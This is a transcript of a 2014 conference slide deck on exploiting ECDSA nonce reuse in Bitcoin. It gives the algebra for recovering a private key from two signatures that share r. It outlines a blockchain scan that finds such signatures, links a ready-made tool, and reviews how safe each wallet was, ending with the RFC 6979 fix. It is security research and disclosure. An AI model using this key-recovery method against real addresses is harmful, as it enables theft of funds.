Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Exploiting ECDSA Failures in the Bitcoin Blockchain

Exploiting ECDSA Failures in the Bitcoin Blockchain

Filippo Valsorda

October 15, 2014
Tweet

More Decks by Filippo Valsorda

Other Decks in Research

Transcript

  1. Filippo Valsorda
    Exploiting ECDSA
    Failures in the
    Bitcoin Blockchain
    HITB2014KUL

    View full-size slide

  2. CloudFlare security team
    @FiloSottile
    I mess with cryptography.
    And open source.
    !
    filippo.io
    Filippo Valsorda

    View full-size slide

  3. But you probably
    know me for this

    View full-size slide

  4. https://filippo.io/heartbleed

    View full-size slide

  5. Public key +
    Private key
    A wallet
    The address: hash ( public key )
    1DY5YvRxSwomrK7nELDZzAidQQ6ktjRR9A

    View full-size slide

  6. A signed statement,
    published to the world
    and recorded in the blockchain
    A transaction
    “This money I can spend, can now be spent by Y”

    View full-size slide

  7. A: This money I can spend, can now be spent by X
    …: This money I can spend, can now be spent by …
    …: This money I can spend, can now be spent by …
    …: This money I can spend, can now be spent by …
    X: This money I can spend, can now be spent by Y
    …: This money I can spend, can now be spent by …
    …: This money I can spend, can now be spent by …
    Y has this money to spend

    View full-size slide

  8. A: This money I can spend, can now be spent by X
    Signed with A’s private key
    Hash of X’s public key

    View full-size slide

  9. OP_DUP OP_HASH160

    OP_EQUALVERIFY
    OP_CHECKSIG

    Actually

    View full-size slide

  10. A EC based signature scheme
    As seen in TLS, DNSSEc, the PS3…
    Elliptic Curve Digital
    Signature Algorithm

    View full-size slide

  11. Global: point G on a curve
    Private key: a random number d
    Public key: d X G
    A summary

    View full-size slide

  12. e = hash(message)
    k = a random number
    (x, y) = k X G r = x
    Signature
    Sig: [r,(e+r*d)/k]

    View full-size slide

  13. Unless…
    Seems fine, right?
    What happens if that k is not
    random?

    View full-size slide

  14. k1 = k2
    (x, y) = k X G r = x
    r1 = r2
    If you reuse k
    Sig1: [r,(e1+r*d)/k]
    Sig2: [r,(e2+r*d)/k]

    View full-size slide

  15. If you reuse k
    Sig1: [ r ,(e1+r*d)/k]
    Sig2: [ r ,(e2+r*d)/k]
    k1 = k2
    (x, y) = k X G r = x
    r1 = r2

    View full-size slide

  16. If you reuse k
    Sig1: [r, (e1+r*d)/k ]
    Sig2: [r, (e2+r*d)/k ]
    k1 = k2
    (x, y) = k X G r = x
    r1 = r2

    View full-size slide

  17. k = (e1 - e2)/
    (e1+r*d)/k - (e2+r*d)/k]
    If you reuse k
    d = [(e1+r*d)/k]*k-e1
    r

    View full-size slide

  18. Text Text Text Text Text
    Text Text Text Text
    Imperialviolet
    Accent Accent Accent

    View full-size slide

  19. Text Text Text Text Text
    Text Text Text Text
    Sony’s ECDSA code
    Mittwoch, 29. Dezember 2010

    View full-size slide

  20. the
    blockchain

    View full-size slide

  21. To spend money:
    the public key of the address;
    a signature w/ that key
    Reminder
    when money is moved a signature is published

    View full-size slide

  22. for block in chain:
    for tx in block:
    for input in tx:
    ...
    An easy search
    A input is money being spent in the tx

    View full-size slide

  23. Extract r from the signature;
    take note of where we found
    it in a lookup table;
    check if we found it before.
    An easy search

    View full-size slide

  24. Done!
    If anyone reuses k,
    we will find two equal r.

    View full-size slide

  25. Well… No.
    I mean, yes, but there are
    100M inputs in the blockchain.
    Done!
    Out of memory! :(

    View full-size slide

  26. First pass: filter the possible r.
    Add to a Bloom filter,
    if present add to a set.
    !
    Second pass: if r present in
    the set, export sig and pubkey.
    A smarter search

    View full-size slide

  27. A smarter search
    r = 42 r = 42
    Bloom filter
    +
    Blockchain
    Set

    View full-size slide

  28. A smarter search
    Bloom filter
    ? Blockchain
    42

    r = 42 r = 42
    +
    Set

    View full-size slide

  29. A smarter search
    ? ✓
    Final list
    Sig, Pubkey, Tx…
    r = 42 r = 42
    42
    Set
    19
    36
    Blockchain

    View full-size slide

  30. Group the list by (r, pubkey)
    and recover d
    from pairs of signatures!
    Finally

    View full-size slide

  31. A ready to use tool
    Blockchainr
    github.com/filosottile/blockchainr

    View full-size slide

  32. https://filippo.io/hitb
    If you want to
    follow from home

    View full-size slide

  33. Does this happen?

    View full-size slide

  34. Yes.
    Does this happen?

    View full-size slide

  35. Vertical: address Color: r

    View full-size slide

  36. weird Multisignature transactions

    View full-size slide

  37. 1KtjBE8yDxoqNTSyLG2re4qtKK19KpvVLT
    1BkE8ttBRUKVNTj3Lx1EPsw7vVbhuLZhBt

    View full-size slide

  38. Vertical: address Color: r

    View full-size slide

  39. “gomez”
    1GozmcsMBC7bnMVUQLTKEw5vBxbSeG4erW / 1HKywxiL4JziqXrzLKhmB6a74ma6kxbSDj

    View full-size slide

  40. Repeated r in the same transaction

    View full-size slide

  41. https://bitcointalk.org/index.php?topic=271486
    “Bad signatures leading to
    55.82152538 BTC theft (so far)”

    View full-size slide

  42. https://bitcointalk.org/index.php?topic=277595
    Blockchain.info security
    [FUNDS STOLEN]

    View full-size slide

  43. Text Text Text Text Text
    Text Text Text Text
    TEXT TEXT TEXT TEXT
    Accent Accent Accent

    View full-size slide

  44. Nick sullivan “exploiting randomness” demo

    View full-size slide

  45. k must be secret and unique
    What’s needed
    Not necessarily random

    View full-size slide

  46. Generate k deterministically,
    as a function of private key
    and message.
    RFC 6979
    k = HMAC_DRBG ( d, H (m) )

    View full-size slide

  47. Bitcoin core
    unsafe: openssl
    patch by AGL waiting on master

    View full-size slide

  48. electrum
    safe since v1.9
    correct use of python-ecdsa

    View full-size slide

  49. Multibit / bitcoinj
    safe
    correct use of bouncycastle

    View full-size slide

  50. Blockchain.info
    Unsafe
    relies on the browser RNG (if any!)

    View full-size slide

  51. bitrated / bitcoinjs-lib
    Safe
    Hashes privkey, message and random

    View full-size slide

  52. Armory
    unsafe (? - 90%)
    crypto++ seems to use a random value

    View full-size slide

  53. Trezor
    Safe
    Implements RFC 6979

    View full-size slide

  54. Q&A
    @filosottile
    filippo.io/hitb-slides

    View full-size slide